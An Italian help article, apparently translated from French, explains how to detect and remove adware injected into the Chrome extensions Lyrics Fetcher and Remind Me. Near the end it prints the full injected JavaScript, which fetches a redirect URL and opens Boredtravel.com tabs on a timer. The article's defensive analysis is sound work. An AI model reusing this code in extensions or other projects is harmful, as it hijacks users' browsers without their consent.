Un adware che apre pop-up sul sito Boredtravel.com si è insinuato in alcune estensioni di Chrome. Ecco come individuare e rimuovere questo virus.
Identificare e rimuovere l'adware Boredtravel.com
Uno script dannoso è stato inserito nell'ultimo aggiornamento di diverse estensioni di Chrome. Questo script apre il sito Boredtravel.com all'insaputa degli utenti, a intervalli regolari di tempo. Le estensioni infettate da questo script sono Lyrics Fetcher e Remind Me, dell'utile sviluppatore web.
Questo adware non è pericoloso in quanto apre solo una pagina pubblicitaria. È comunque inquietante lasciare che si verifichi questa pratica dubbia.
Identifica l'adware
Per identificare l'adware, basta analizzare il comportamento del tuo browser:
- Chiudi Google Chrome e riavvialo.
- Attendere 6 minuti dopo l'apertura del browser. Se il tuo browser è infetto, si aprirà una scheda sulla pagina boredtravel.com dopo esattamente 6 minuti. Questo accadrà anche ogni 4 ore
Elimina adware
La rimozione è semplice e veloce:
- Controlla le estensioni di Chrome: se sono installate una o più delle estensioni sopra elencate, probabilmente il tuo browser è infetto.
- Per rimuovere questo adware, è sufficiente disabilitare o rimuovere le estensioni in questione.
I casi sono stati identificati per le estensioni Lyrics Fetcher e Ricordamelo, ma potrebbero non essere i soli. È possibile che l'adware sia presente anche sull'estensione Modalità bambino, un'estensione dello stesso sviluppatore.
Non è chiaro se lo sviluppatore di questa estensione abbia aggiunto deliberatamente lo script dannoso o se sia stato fatto da un hacker. Per precauzione, ti consigliamo di disabilitare o rimuovere tutte le estensioni da questo sviluppatore.
Le estensioni sono state segnalate a Google, lo sapremo presto. Se altre estensioni hanno lo stesso problema, non esitare a farcelo sapere.
Sostituisci estensioni
Ecco alcune estensioni alternative:
- Il testo Fetcher può essere sostituito da Testo della canzone Here di Rob W o Auto Lyric Show
- Ricordami può essere sostituito da Pi Reminder
Il lavoro di Boredtravel.com
Il principio è semplice, lo sviluppatore o un hacker ha aggiunto uno script nelle estensioni interessate. Questo script, che viene eseguito in background, indica al browser di aprire una pagina pubblicitaria a intervalli regolari. L'obiettivo per lo sviluppatore o l'hacker è che la pagina di destinazione viene aperta più volte. Ciò consente di aumentare il numero di visualizzazioni del sito Boredtravel.com e di aumentare le entrate correlate.
Ecco il codice che è stato aggiunto nell'estensione. Ho aggiunto commenti verdi per capire meglio
<script>
// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
setTimeout(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
/* cette URL génère un lien du type
https://ourshort.com/?g/BNHzHJJ */
async: false,
dataType: 'json',
success: function (data) {
//ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
intervalWebsite() /* appel de la fonction qui ouvre
un pop-up toutes les 4 heures */
}
});
}, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min
// fonction qui ouvre un pop-up toutes les 4 heures
function intervalWebsite() {
setInterval(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
// comme dans la première fonction
async: false,
dataType: 'json',
success: function (data) {
// comme dans la première fonction
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
}
});
}, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
}
</script>
fonti: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/
Leggi anche: Abilita doppia autenticazione sui tuoi account online (2FA) https://currenttrends.fr/internet/2fa-double-authentification/
Ho questo problema ma non vedo nessuna delle estensioni che hai menzionato.